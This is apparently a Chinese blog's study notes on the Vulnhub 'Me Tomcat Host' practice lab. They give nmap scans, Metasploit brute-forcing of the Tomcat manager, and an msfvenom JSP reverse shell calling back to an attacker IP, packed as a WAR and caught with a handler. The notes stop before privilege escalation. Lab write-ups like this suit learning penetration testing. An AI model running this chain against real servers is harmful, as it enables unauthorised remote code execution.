Vulnhub靶场-Me Tomcat Host 学习笔记
2024-09-06 06:05:55
Nmap -sS -Pn 192.168.232.0/24
nmap -v -A -sS -Pn -T4 -p 1-65535 192.168.232.132
扫页面
数据库部署成功后打开msf,利用这个模块:use auxiliary/scanner/http/tomcat_mgr_login
Show Options查看需要部署的选项
RHOSTS:目标机ip
THREAD:线程,设为5即可
BRUTEFORCE_SPEED:攻击速度
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.232.130 LPORT=10086 > shell.jsp
jar -cvf shell.war shell.jsp
在Tomcat里面上传此Shell
用MSF来监听
console
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 192.168.232.130
set LPORT 10086
exploit
完成远程命令执行 权限为tomcat
接下来为提权(做完继续更= - = 目前刚做到这)
最新文章
- 如何一步一步用DDD设计一个电商网站(二)—— 项目架构
- 强大css3制作新浪LOGO 胜过PS
- mysql 检查字符串是否包含子串
- LDS,LES,LFS,LGS,LSS指令
- HTML5每日一练之details展开收缩标签的应用
- Appium自动化测试环境的搭建及脚本执行
- SGU 181.X-Sequence
- 2.2.2 从 Path 中获取信息
- Unity3D NGUI UIPlayTween控件(一)动态打开关闭窗口
- stl_map,set 用法
- Java - Instrumentation
- Windows下杀掉全部的子线程
- 微信小程序之弹出操作菜单
- 辨析element.offsetXxxx和element.style.xxxx
- vue环境下安装npm,启动npm 修改js,css样式
- Java10-java语法基础(九)——java的封装性
- 阿里云存储oss+怎么上传找文件夹
- 05-老马jQuery教程-动画
- springMVC集成CXF快速发布webService
- 什么是Gradle
热门文章
- Spring cloud系列教程第十篇- Spring cloud整合Eureka总结篇
- bzoj3289Mato的文件管理
- J.U.C体系进阶(二):juc-locks 锁框架
- 【软件安装】在 CentOS 7(Linux)上部署流媒体服务(Tengine、ffmpeg、Centos 7、nginx-http-flv-module、OBS)
- 仔细想想SpringAOP也不难嘛,面试没有必要慌
- 使用SQL语句进行特定值排序
- 设计模式:memento模式
- 第 13 篇:DRF 框架之 API 版本管理
- Nginx(一)Linux上的Nginx安装步骤
- 面试题二十二:链表中倒数第k个节点